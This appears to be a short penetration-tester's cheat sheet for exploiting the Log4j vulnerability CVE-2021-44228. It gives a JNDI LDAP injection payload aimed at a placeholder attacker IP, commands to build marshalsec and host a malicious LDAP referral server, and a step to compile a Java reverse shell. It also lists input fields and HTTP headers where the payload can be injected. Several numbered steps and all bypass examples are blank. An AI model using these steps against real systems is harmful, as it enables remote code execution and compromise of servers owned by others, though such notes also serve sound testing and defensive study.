githubEdit

Log4j

CVE-2021–44228 Log4j

CVSS Score: 10

Tools: mvn marshalsec netcat JNDI Exploit kit https://github.com/pimps/JNDI-Exploit-Kit

Payload example:

${jndi:ldap://ATTACKER_IP:1389/Exploit.class}

Steps:

1)

cd /marshalsec

2)

mvn clean package -DskipTests (Install marshalsec utility)

3)

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://ATTACKER_IP:8000/#Exploit" (Host LDAP server with marshalsec)

4) Create a java reverse shell exploit (Exploit.java)

5)

javac Exploit.java -target 8 -source 8 (Compile the java exploit into a class file (Exploit.class))

6)

7)

8)

JNDI syntax injection:

1) Anywhere that has data logged by the application

2) Input boxes, user and password login forms, data entry points within applications

3) HTTP headers such as User-Agent, X-Forwarded-For, X-ApiVersion, or other customizable headers

4) Any place for user-supplied data

Bypass examples:

1)

2)

3)

4)

5)

6)

7)

Last updated